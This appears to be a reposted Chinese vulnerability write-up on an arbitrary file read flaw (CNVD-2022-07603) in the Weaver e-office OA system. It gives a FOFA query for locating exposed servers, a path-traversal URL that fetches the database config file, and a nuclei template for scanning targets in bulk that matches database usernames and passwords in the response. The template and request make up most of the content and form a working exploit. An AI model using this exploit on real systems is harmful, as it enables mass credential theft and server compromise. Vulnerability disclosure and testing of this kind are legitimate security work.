首页 > 其他分享 >泛微E-Office协同管理系统存在任意文件读取漏洞CNVD-2022-07603

泛微E-Office协同管理系统存在任意文件读取漏洞CNVD-2022-07603

时间:2023-10-19 22:56:55浏览次数:32  
标签:文件 officeserver2 读取 Office CNVD 泛微 漏洞 07603

漏洞描述

泛微e-office是一款由泛微网络科技股份有限公司开发的办公自动化(Office Automation,简称OA)系统。它是一种基于Web的协同办公平台,可以帮助企业实现电子化、自动化、智能化的办公环境。
泛微e-office officeserver2.php文件存在任意文件读取漏洞,攻击者可利用该漏洞读取服务器任意文件,获取服务器敏感信息。

影响版本

<= e-office 10.x

漏洞复现

fofa语法:app="泛微-EOffice"
登录页面如下:

POC:/iweboffice/officeserver2.php?OPTION=LOADFILE&FILENAME=../mysql_config.ini

nuclei批量yaml文件

id: weaver_office_officeserver2_fileread
info:
  name: 泛微E-Office协同管理系统存在任意文件读取漏洞CNVD-2022-07603
  author: mhb17
  severity: high
  description: description
  reference:
    - https://
  tags: fileread
requests:
  - raw:
      - |+
        GET /iweboffice/officeserver2.php?OPTION=LOADFILE&FILENAME=../mysql_config.ini HTTP/1.1
        Host: {{Hostname}}
        Upgrade-Insecure-Requests: 1
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.120 Safari/537.36
        Connection: close

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'dataname = '
      - type: word
        part: body
        words:
          - datapassword =
      - type: word
        part: header
        words:
          - '200'

标签:文件,officeserver2,读取,Office,CNVD,泛微,漏洞,07603
From: https://www.cnblogs.com/pursue-security/p/17775896.html

相关文章

  • 泛微E-Office json_common.php文件存在sql注入漏洞
    漏洞简介泛微e-office为企业办公提供丰富应用,覆盖常见协作场景,开箱即用。满足人事、行政、财务、销售、运营、市场等不同部门协作需求,帮助组织高效人事管理。系统json_common.php文件存在SQL注入漏洞漏洞复现fofa语法:app="泛微-EOffice"登录页面如下:POC:POST/building/......
  • PageOffice 6 保存数据区域数据同时保存文档
    在实际应用中,例如在线签订合同的时候,合同的签订日期,合同号等等这些信息既要保存到数据库,合同签订后又要将整个合同文件保存起来。这时候就需要用到PageOffice的保存数据区域数据的同时保存整个文件的功能。后端代码1.后端打开文件的接口方法中,在webOpen方法之前给SaveFilePage和......
  • 禅道V16.5SQL注入漏洞(CNVD-2022-42853)
    禅道V16.5SQL注入漏洞(CNVD-2022-42853)0x01介绍禅道项目管理软件是一款国产的、基于LGPL协议、开源免费的项目管理软件,它集产品管理、项目管理、测试管理于一体,同时还包含了事务管理、组织管理等诸多功能,是中小型企业项目管理的首选,基于自主的PHP开发框架──ZenTaoPHP而成,第三......
  • 畅捷通T+任意文件上传(CNVD-2022-60632 )漏洞复现
    一、漏洞描述022年8月29日和8月30日,畅捷通公司紧急发布安全补丁修复了畅捷通T+软件任意文件上传漏洞。未经身份认证的攻击者利用该漏洞,通过绕过系统鉴权,在特定配置环境下实现任意文件的上传,从而执行任意代码,获得服务器控制权限。目前,已有用户被不法分子利用该漏洞进行勒索病毒攻......
  • Vsto识别wps和office
       我们要开发wps插件了。之前用vsto开发过word插件,我也讲过c#下如何开发wps插件(有点繁琐)。如果采用c#从头再开发wps插件,那么开发出来的office加载项就会出现两个。我们要实现的wps和word插件一致的功能。office加载项如图所示:如何才能够让office和wps插件兼容呢?也就是说一......
  • MASA MAUI 预览Office文件
    目录背景介绍1、新建MAUIBlazor项目2、创建OfficeViewer.razor组件3、使用安卓模拟器运行4、兼容iOS总结背景接到一个在Maui中预览Office文件的需求,包含excel、word、PDF三种常见的文件,经过技术选型,最后选择了微软原生支持的office在线预览Api,原因是此技术方案简单、跨平台。在......
  • centos7.9 安装 openoffice
    1.环境信息centos7.9+openoffice4+jdk82.下载软件https://www.openoffice.org/zh-cn/选择linux版本的tar.gz3.将下载好的安装包通过ftp等工具,上传到服务器上 4.登录服务器,解压缩并安装#切换到上传的文件所在目录cd/d/resources/openoffice4_src#解压......
  • PageOffice6 版本常用事件
    1、AfterDocumentOpened事件打开文件后自动触发的事件是AfterDocumentOpened事件,它通常用于实现文件打开后自动执行某些业务逻辑,比如将默认控件全屏、禁止保存、另存、打印,或者显示或隐藏痕迹等。因此,所有需要在文件打开后自动触发的业务逻辑代码都可以放在此事件中执行。在实......
  • pageoffice多用户同时在线编辑word文档
    转载:多用户同时编辑多用户同时编辑注意本文中展示的代码均为关键代码,复制粘贴到您的项目中,按照实际的情况,例如文档路径,用户名等做适当修改即可使用。总体来说,各种Web系统中的Word文档在线处理大体可以分为以下四种流转处理方式:A用户编辑完,流转给B用户修改,再流转给C用户修改,直......
  • 免费安装微软官方正版OFFICE
    最近几年来,博主一直都是使用的正版的office的key,也就是基友们拼车合买一个家庭版的套装,毕竟一年就四五十元钱,两杯咖啡的钱,也没必要到处找破解浪费时间,况且破解版的也有安全问题。偶然有一个机会,发现有博主分享可以安装免费的、正版的office的方法,微软官方免费的正版office,值得拥有......

赞助商

阅读排行

网站主页关于我们联系我们网站地图

本网站内容转载自其他媒体,侵权联系[admin##ips99.com]。

Copyright © 2020-2023 IPS99 版权所有 IPS99